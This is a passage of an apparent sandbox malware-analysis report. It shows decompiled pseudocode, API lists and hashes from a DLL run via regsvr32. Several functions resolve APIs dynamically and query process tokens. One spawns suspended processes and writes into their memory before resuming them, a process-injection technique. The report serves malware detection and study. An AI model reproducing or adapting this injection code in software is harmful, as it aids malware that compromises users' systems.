                                          					_t40 =  &_v92; // 0x6c6c642e
                                          					_t58 = LoadLibraryA(_t40); // executed
                                          					if(_t58 == 0) {
                                          						goto L4;
                                          					}
                                          					_t59 = GetProcAddress(_t58, _t80);
                                          					if(_t59 == 0) {
                                          						goto L4;
                                          					}
                                          					return _t59;
                                          				}
                                          			}


























                                          APIs
                                          • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                                          • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: .dll
                                          • API String ID: 2574300362-2738580789
                                          • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                          • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                                          • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                          • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 430 1000ca25-1000ca45 call 1000c8fd 433 1000cb73-1000cb76 430->433 434 1000ca4b-1000ca6c call 1000a86d 430->434 437 1000ca72-1000ca74 434->437 438 1000cb63-1000cb72 call 1000861a 434->438 439 1000cb51-1000cb61 call 1000861a 437->439 440 1000ca7a 437->440 438->433 439->438 442 1000ca7d-1000ca7f 440->442 445 1000cb42-1000cb4b 442->445 446 1000ca85-1000ca9b call 1000ae66 442->446 445->437 445->439 450 1000cb00-1000cb04 446->450 451 1000ca9d-1000cab0 call 1000cb77 446->451 452 1000cb06-1000cb08 450->452 453 1000cb2f-1000cb3c 450->453 451->450 458 1000cab2-1000caca 451->458 455 1000cb19-1000cb29 452->455 456 1000cb0a-1000cb10 452->456 453->442 453->445 455->453 456->455 458->450 461 1000cacc-1000cae7 GetLastError ResumeThread 458->461 462 1000cae9-1000caf4 461->462 463 1000cafc-1000cafd CloseHandle 461->463 465 1000caf6 462->465 466 1000caf7 462->466 463->450 465->466 466->463
                                          C-Code - Quality: 89%
                                          			E1000CA25(intOrPtr __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				void* _v36;
                                          				char _v40;
                                          				char _v80;
                                          				char _t37;
                                          				intOrPtr _t38;
                                          				void* _t45;
                                          				intOrPtr _t47;
                                          				intOrPtr _t48;
                                          				intOrPtr _t50;
                                          				intOrPtr _t52;
                                          				void* _t54;
                                          				intOrPtr _t57;
                                          				long _t61;
                                          				intOrPtr _t62;
                                          				signed int _t65;
                                          				signed int _t68;
                                          				signed int _t82;
                                          				void* _t85;
                                          				char _t86;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_v20 = __edx;
                                          				_t65 = 0;
                                          				_t37 = E1000C8FD( &_v8);
                                          				_t86 = _t37;
                                          				_v24 = _t86;
                                          				_t87 = _t86;
                                          				if(_t86 == 0) {
                                          					return _t37;
                                          				}
                                          				_t38 =  *0x1001e688; // 0x1820590
                                          				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
                                          				_t82 = _v8;
                                          				_t68 = 0;
                                          				_v16 = 0;
                                          				if(_t82 == 0) {
                                          					L20:
                                          					E1000861A( &_v24, 0);
                                          					return _t65;
                                          				}
                                          				while(_t65 == 0) {
                                          					while(_t65 == 0) {
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                                          						_t92 = _t45;
                                          						if(_t45 >= 0) {
                                          							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
                                          							if(_t54 != 0) {
                                          								_t57 =  *0x1001e684; // 0x189faa0
                                          								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                                          								if(_t85 != 0) {
                                          									GetLastError();
                                          									_t61 = ResumeThread(_v36);
                                          									_t62 =  *0x1001e684; // 0x189faa0
                                          									if(_t61 != 0) {
                                          										_push(0xea60);
                                          										_push(_t85);
                                          										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                                          											_t65 = _t65 + 1;
                                          										}
                                          										_t62 =  *0x1001e684; // 0x189faa0
                                          									}
                                          									CloseHandle(_t85);
                                          								}
                                          							}
                                          						}
                                          						if(_v40 != 0) {
                                          							if(_t65 == 0) {
                                          								_t52 =  *0x1001e684; // 0x189faa0
                                          								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                                          							}
                                          							_t48 =  *0x1001e684; // 0x189faa0
                                          							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                                          							_t50 =  *0x1001e684; // 0x189faa0
                                          							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                                          						}
                                          						_t68 = _v16;
                                          						_t47 = _v12 + 1;
                                          						_v12 = _t47;
                                          						if(_t47 < 2) {
                                          							continue;
                                          						} else {
                                          							break;
                                          						}
                                          					}
                                          					_t82 = _v8;
                                          					_t68 = _t68 + 1;
                                          					_v16 = _t68;
                                          					if(_t68 < _t82) {
                                          						continue;
                                          					} else {
                                          						break;
                                          					}
                                          					do {
                                          						goto L19;
                                          					} while (_t82 != 0);
                                          					goto L20;
                                          				}
                                          				L19:
                                          				E1000861A(_t86, 0xfffffffe);
                                          				_t86 = _t86 + 4;
                                          				_t82 = _t82 - 1;
                                          			}




























                                          APIs
                                            • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                                            • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                            • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                                            • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                            • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                            • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                            • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                          • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                                          • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                                          • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                                          • String ID:
                                          • API String ID: 1274669455-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 467 1000b998-1000b9b8 GetTokenInformation 468 1000b9ba-1000b9c3 GetLastError 467->468 469 1000b9fe 467->469 468->469 470 1000b9c5-1000b9d5 call 10008604 468->470 471 1000ba00-1000ba04 469->471 474 1000b9d7-1000b9d9 470->474 475 1000b9db-1000b9ee GetTokenInformation 470->475 474->471 475->469 476 1000b9f0-1000b9fc call 1000861a 475->476 476->474
                                          C-Code - Quality: 86%
                                          			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _t12;
                                          				void* _t20;
                                          				void* _t22;
                                          				union _TOKEN_INFORMATION_CLASS _t28;
                                          				void* _t31;
                                          
                                          				_push(_t22);
                                          				_push(_t22);
                                          				_t31 = 0;
                                          				_t28 = __edx;
                                          				_t20 = _t22;
                                          				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                          					L6:
                                          					_t12 = _t31;
                                          				} else {
                                          					_t31 = E10008604(_v8);
                                          					_v12 = _t31;
                                          					if(_t31 != 0) {
                                          						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                          							goto L6;
                                          						} else {
                                          							E1000861A( &_v12, _t16);
                                          							goto L3;
                                          						}
                                          					} else {
                                          						L3:
                                          						_t12 = 0;
                                          					}
                                          				}
                                          				return _t12;
                                          			}











                                          APIs
                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                                          • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                          • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InformationToken$AllocErrorHeapLast
                                          • String ID:
                                          • API String ID: 4258577378-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 612 1000ae66-1000aeb3 memset CreateProcessW
                                          C-Code - Quality: 47%
                                          			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                          				struct _STARTUPINFOW _v72;
                                          				signed int _t11;
                                          				WCHAR* _t15;
                                          				int _t19;
                                          				struct _PROCESS_INFORMATION* _t20;
                                          
                                          				_t20 = __edx;
                                          				_t15 = __ecx;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t19 = 0x44;
                                          				memset( &_v72, 0, _t19);
                                          				_v72.cb = _t19;
                                          				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                                          				asm("sbb eax, eax");
                                          				return  ~( ~_t11) - 1;
                                          			}









                                          APIs
                                          • memset.MSVCRT ref: 1000AE85
                                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcessmemset
                                          • String ID:
                                          • API String ID: 2296119082-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				char _t5;
                                          				struct HINSTANCE__* _t7;
                                          				void* _t10;
                                          				void* _t12;
                                          				void* _t22;
                                          				void* _t25;
                                          
                                          				_push(__ecx);
                                          				_t12 = __ecx;
                                          				_t22 = __edx;
                                          				_t5 = E100095C7(_a4);
                                          				_t25 = 0;
                                          				_v8 = _t5;
                                          				_push(_t5);
                                          				if(_a4 != 0x7c3) {
                                          					_t7 = LoadLibraryA(); // executed
                                          				} else {
                                          					_t7 = GetModuleHandleA();
                                          				}
                                          				if(_t7 != 0) {
                                          					_t10 = E1000E171(_t12, _t22, _t7); // executed
                                          					_t25 = _t10;
                                          				}
                                          				E100085C2( &_v8);
                                          				return _t25;
                                          			}











                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 4133054770-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
                                          				CHAR* _v8;
                                          				int _t28;
                                          				signed int _t31;
                                          				signed int _t34;
                                          				signed int _t35;
                                          				void* _t38;
                                          				signed int* _t41;
                                          
                                          				_t41 = _a8;
                                          				_t31 = 0;
                                          				if(_t41[1] > 0) {
                                          					_t38 = 0;
                                          					do {
                                          						_t3 =  &(_t41[2]); // 0xe6840d8b
                                          						_t34 =  *_t3;
                                          						_t35 = 0;
                                          						_a8 = 0;
                                          						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                                          							_v8 = _a4 + 0x24;
                                          							while(1) {
                                          								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                                          								_t14 =  &(_t41[2]); // 0xe6840d8b
                                          								_t34 =  *_t14;
                                          								if(_t28 == 0) {
                                          									break;
                                          								}
                                          								_t35 = _a8 + 1;
                                          								_a8 = _t35;
                                          								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                                          									continue;
                                          								} else {
                                          								}
                                          								goto L8;
                                          							}
                                          							 *_t41 =  *_t41 |  *(_t34 + _t38);
                                          						}
                                          						L8:
                                          						_t31 = _t31 + 1;
                                          						_t38 = _t38 + 0x10;
                                          						_t20 =  &(_t41[1]); // 0x1374ff85
                                          					} while (_t31 <  *_t20);
                                          				}
                                          				Sleep(0xa);
                                          				return 1;
                                          			}











                                          APIs
                                          • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                                          • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Sleeplstrcmpi
                                          • String ID:
                                          • API String ID: 1261054337-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E10005E96() {
                                          				intOrPtr _t3;
                                          
                                          				_t3 =  *0x1001e684; // 0x189faa0
                                          				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
                                          				ExitProcess(0);
                                          			}





                                          APIs
                                          • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E100085EF() {
                                          				void* _t1;
                                          
                                          				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                          				 *0x1001e768 = _t1;
                                          				return _t1;
                                          			}





                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeap
                                          • String ID:
                                          • API String ID: 10892065-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 50%
                                          			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				char _v48;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				signed int _v60;
                                          				char* _v72;
                                          				signed short _v80;
                                          				signed int _v84;
                                          				char _v88;
                                          				char _v92;
                                          				char _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v616;
                                          				intOrPtr* _t159;
                                          				char _t165;
                                          				signed int _t166;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				signed int _t186;
                                          				intOrPtr* _t187;
                                          				signed int _t188;
                                          				signed int _t192;
                                          				intOrPtr* _t193;
                                          				intOrPtr _t200;
                                          				intOrPtr* _t205;
                                          				signed int _t207;
                                          				signed int _t209;
                                          				intOrPtr* _t210;
                                          				intOrPtr _t212;
                                          				intOrPtr* _t213;
                                          				signed int _t214;
                                          				char _t217;
                                          				signed int _t218;
                                          				signed int _t219;
                                          				signed int _t230;
                                          				signed int _t235;
                                          				signed int _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				intOrPtr* _t247;
                                          				intOrPtr* _t251;
                                          				signed int _t252;
                                          				intOrPtr* _t253;
                                          				void* _t255;
                                          				intOrPtr* _t261;
                                          				signed int _t262;
                                          				signed int _t283;
                                          				signed int _t289;
                                          				char* _t298;
                                          				void* _t320;
                                          				signed int _t322;
                                          				intOrPtr* _t323;
                                          				intOrPtr _t324;
                                          				signed int _t327;
                                          				intOrPtr* _t328;
                                          				intOrPtr* _t329;
                                          
                                          				_v32 = _v32 & 0x00000000;
                                          				_v60 = _v60 & 0x00000000;
                                          				_v56 = __edx;
                                          				_v100 = __ecx;
                                          				_t159 = E1000D523(__ecx);
                                          				_t251 = _t159;
                                          				_v104 = _t251;
                                          				if(_t251 == 0) {
                                          					return _t159;
                                          				}
                                          				_t320 = E10008604(0x10);
                                          				_v36 = _t320;
                                          				_pop(_t255);
                                          				if(_t320 == 0) {
                                          					L53:
                                          					E1000861A( &_v60, 0xfffffffe);
                                          					E1000D5D7( &_v104);
                                          					return _t320;
                                          				}
                                          				_t165 = E100095E1(_t255, 0x536);
                                          				 *_t328 = 0x609;
                                          				_v52 = _t165;
                                          				_t166 = E100095E1(_t255);
                                          				_push(0);
                                          				_push(_v56);
                                          				_v20 = _t166;
                                          				_push(_t166);
                                          				_push(_a4);
                                          				_t322 = E100092E5(_t165);
                                          				_v60 = _t322;
                                          				E100085D5( &_v52);
                                          				E100085D5( &_v20);
                                          				_t329 = _t328 + 0x20;
                                          				if(_t322 != 0) {
                                          					_t323 = __imp__#2;
                                          					_v40 =  *_t323(_t322);
                                          					_t173 = E100095E1(_t255, 0x9e4);
                                          					_v20 = _t173;
                                          					_v52 =  *_t323(_t173);
                                          					E100085D5( &_v20);
                                          					_t324 = _v40;
                                          					_t261 =  *_t251;
                                          					_t252 = 0;
                                          					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                          					__eflags = _t178;
                                          					if(_t178 != 0) {
                                          						L52:
                                          						__imp__#6(_t324);
                                          						__imp__#6(_v52);
                                          						goto L53;
                                          					}
                                          					_t262 = _v32;
                                          					_v28 = 0;
                                          					_v20 = 0;
                                          					__eflags = _t262;
                                          					if(_t262 == 0) {
                                          						L49:
                                          						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                          						__eflags = _t252;
                                          						if(_t252 == 0) {
                                          							E1000861A( &_v36, 0);
                                          							_t320 = _v36;
                                          						} else {
                                          							 *(_t320 + 8) = _t252;
                                          							 *_t320 = E100091E3(_v100);
                                          							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
                                          						}
                                          						goto L52;
                                          					} else {
                                          						goto L6;
                                          					}
                                          					while(1) {
                                          						L6:
                                          						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                          						__eflags = _t186;
                                          						if(_t186 != 0) {
                                          							break;
                                          						}
                                          						_v16 = 0;
                                          						_v48 = 0;
                                          						_v12 = 0;
                                          						_v24 = 0;
                                          						__eflags = _v84;
                                          						if(_v84 == 0) {
                                          							break;
                                          						}
                                          						_t187 = _v28;
                                          						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                          						__eflags = _t188;
                                          						if(_t188 >= 0) {
                                          							__imp__#20(_v24, 1,  &_v16);
                                          							__imp__#19(_v24, 1,  &_v48);
                                          							_t46 = _t320 + 0xc; // 0xc
                                          							_t253 = _t46;
                                          							_t327 = _t252 << 3;
                                          							_t47 = _t327 + 8; // 0x8
                                          							_t192 = E10008698(_t327, _t47);
                                          							__eflags = _t192;
                                          							if(_t192 == 0) {
                                          								__imp__#16(_v24);
                                          								_t193 = _v28;
                                          								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                          								L46:
                                          								_t252 = _v20;
                                          								break;
                                          							}
                                          							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                          							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
                                          							_t200 =  *_t253;
                                          							__eflags =  *(_t327 + _t200 + 4);
                                          							if( *(_t327 + _t200 + 4) == 0) {
                                          								_t136 = _t320 + 0xc; // 0xc
                                          								E1000861A(_t136, 0);
                                          								E1000861A( &_v36, 0);
                                          								__imp__#16(_v24);
                                          								_t205 = _v28;
                                          								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                          								_t320 = _v36;
                                          								goto L46;
                                          							}
                                          							_t207 = _v16;
                                          							while(1) {
                                          								_v12 = _t207;
                                          								__eflags = _t207 - _v48;
                                          								if(_t207 > _v48) {
                                          									break;
                                          								}
                                          								_v44 = _v44 & 0x00000000;
                                          								_t209 =  &_v12;
                                          								__imp__#25(_v24, _t209,  &_v44);
                                          								__eflags = _t209;
                                          								if(_t209 < 0) {
                                          									break;
                                          								}
                                          								_t212 = E100091E3(_v44);
                                          								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                          								_t213 = _v28;
                                          								_t281 =  *_t213;
                                          								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                          								__eflags = _t214;
                                          								if(_t214 < 0) {
                                          									L39:
                                          									__imp__#6(_v44);
                                          									_t207 = _v12 + 1;
                                          									__eflags = _t207;
                                          									continue;
                                          								}
                                          								_v92 = E100095E1(_t281, 0x250);
                                          								 *_t329 = 0x4cc;
                                          								_t217 = E100095E1(_t281);
                                          								_t283 = _v80;
                                          								_v96 = _t217;
                                          								_t218 = _t283 & 0x0000ffff;
                                          								__eflags = _t218 - 0xb;
                                          								if(__eflags > 0) {
                                          									_t219 = _t218 - 0x10;
                                          									__eflags = _t219;
                                          									if(_t219 == 0) {
                                          										L35:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											L38:
                                          											E100085D5( &_v92);
                                          											E100085D5( &_v96);
                                          											__imp__#9( &_v80);
                                          											goto L39;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%d");
                                          										L37:
                                          										_push(0xc);
                                          										_push(_t289);
                                          										E10009640();
                                          										_t329 = _t329 + 0x10;
                                          										goto L38;
                                          									}
                                          									_t230 = _t219 - 1;
                                          									__eflags = _t230;
                                          									if(_t230 == 0) {
                                          										L33:
                                          										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
                                          										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                          										__eflags = _t289;
                                          										if(_t289 == 0) {
                                          											goto L38;
                                          										}
                                          										_push(_v72);
                                          										_push(L"%u");
                                          										goto L37;
                                          									}
                                          									_t235 = _t230 - 1;
                                          									__eflags = _t235;
                                          									if(_t235 == 0) {
                                          										goto L33;
                                          									}
                                          									__eflags = _t235 == 1;
                                          									if(_t235 == 1) {
                                          										goto L33;
                                          									}
                                          									L28:
                                          									__eflags = _t283 & 0x00002000;
                                          									if((_t283 & 0x00002000) == 0) {
                                          										_v88 = E100095E1(_t283, 0x219);
                                          										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                          										E100085D5( &_v88);
                                          										_t329 = _t329 + 0x18;
                                          										_t298 =  &_v616;
                                          										L31:
                                          										_t242 = E100091E3(_t298);
                                          										L32:
                                          										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                          										goto L38;
                                          									}
                                          									_t242 = E1000DA20( &_v80);
                                          									goto L32;
                                          								}
                                          								if(__eflags == 0) {
                                          									__eflags = _v72 - 0xffff;
                                          									_t298 = L"TRUE";
                                          									if(_v72 != 0xffff) {
                                          										_t298 = L"FALSE";
                                          									}
                                          									goto L31;
                                          								}
                                          								_t243 = _t218 - 1;
                                          								__eflags = _t243;
                                          								if(_t243 == 0) {
                                          									goto L38;
                                          								}
                                          								_t244 = _t243 - 1;
                                          								__eflags = _t244;
                                          								if(_t244 == 0) {
                                          									goto L35;
                                          								}
                                          								_t245 = _t244 - 1;
                                          								__eflags = _t245;
                                          								if(_t245 == 0) {
                                          									goto L35;
                                          								}
                                          								__eflags = _t245 != 5;
                                          								if(_t245 != 5) {
                                          									goto L28;
                                          								}
                                          								_t298 = _v72;
                                          								goto L31;
                                          							}
                                          							__imp__#16(_v24);
                                          							_t210 = _v28;
                                          							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                          							_t252 = _v20;
                                          							L42:
                                          							_t262 = _v32;
                                          							_t252 = _t252 + 1;
                                          							_v20 = _t252;
                                          							__eflags = _t262;
                                          							if(_t262 != 0) {
                                          								continue;
                                          							}
                                          							L48:
                                          							_t324 = _v40;
                                          							goto L49;
                                          						}
                                          						_t247 = _v28;
                                          						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                          						goto L42;
                                          					}
                                          					_t262 = _v32;
                                          					goto L48;
                                          				} else {
                                          					E1000861A( &_v36, _t322);
                                          					_t320 = _v36;
                                          					goto L53;
                                          				}
                                          			}
                                          0x1000de15
                                          0x1000de1a
                                          0x1000de26
                                          0x00000000
                                          0x1000de26
                                          0x1000ddd8
                                          0x00000000
                                          0x1000ddd8
                                          0x1000dd7b
                                          0x1000dda2
                                          0x1000dda7
                                          0x1000ddac
                                          0x1000ddae
                                          0x1000ddae
                                          0x00000000
                                          0x1000ddac
                                          0x1000dd7d
                                          0x1000dd7d
                                          0x1000dd80
                                          0x00000000
                                          0x00000000
                                          0x1000dd86
                                          0x1000dd86
                                          0x1000dd89
                                          0x00000000
                                          0x00000000
                                          0x1000dd8f
                                          0x1000dd8f
                                          0x1000dd92
                                          0x00000000
                                          0x00000000
                                          0x1000dd98
                                          0x1000dd9b
                                          0x00000000
                                          0x00000000
                                          0x1000dd9d
                                          0x00000000
                                          0x1000dd9d
                                          0x1000dedf
                                          0x1000dee5
                                          0x1000deeb
                                          0x1000deee
                                          0x1000def1
                                          0x1000def1
                                          0x1000def4
                                          0x1000def5
                                          0x1000def8
                                          0x1000defa
                                          0x00000000
                                          0x00000000
                                          0x1000df4a
                                          0x1000df4a
                                          0x00000000
                                          0x1000df4a
                                          0x1000dc81
                                          0x1000dc87
                                          0x00000000
                                          0x1000dc87
                                          0x1000df47
                                          0x00000000
                                          0x1000dbca
                                          0x1000dbcf
                                          0x1000dbd4
                                          0x00000000
                                          0x1000dbd8

                                          APIs
                                            • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                            • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                            • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
